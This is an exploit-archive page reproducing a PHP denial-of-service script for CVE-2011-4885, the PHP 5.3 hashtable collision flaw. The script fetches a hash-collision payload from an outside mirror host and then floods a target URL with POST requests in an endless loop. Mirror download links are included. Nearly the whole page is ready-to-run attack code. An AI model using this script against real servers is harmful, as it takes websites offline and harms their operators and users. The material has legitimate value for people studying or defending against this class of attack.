Skip to content
cyberexploits
dosphptext

PHP 5.3.8 - Hashtables Denial of Service

PHP 5.3.8 - Hashtables Denial of Service

Publié le 2012-01-01

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/dos/18296.txt7eac4c3a
raw
  



# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service

Exploit

 # Date: 1/1/12

 # Author: infodox

 # Software Link: php.net

 #

Version: 5.3.*

 # Tested on: Linux

 # CVE : CVE-2011-4885 



Exploit

Download -- http://infodox.co.cc/Downloads/phpdos.txt 



<?php

/*

PHP 5.3.* Hash Colission DoS Exploit by infodox

Original version by itz me (opensc.ws)

CVE-2011-4885



Mirrors List:

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18296.txt (hashcollide.txt)

http://compsoc.nuigalway.ie/~infodox/hashcollide.txt

http://jrs-s.net/hashcollide.txt

http://www.infodox.co.cc/Downloads/hashcollide.txt



Changes:

Different mirror for hashcollide.txt

Now takes target as a command line argument

Status message printing



Twitter: @info_dox

Blog: blog.infodox.co.cc

Site: http://www.infodox.co.cc/

*/

$targ = $argv[1];

$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...

while(1) {

 echo "firing";

 $ch = curl_init("$targ");

 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);

 curl_exec($ch);

 curl_close($ch);

 echo "[+] Voly Sent!";

}

?>
Voir sur GitHub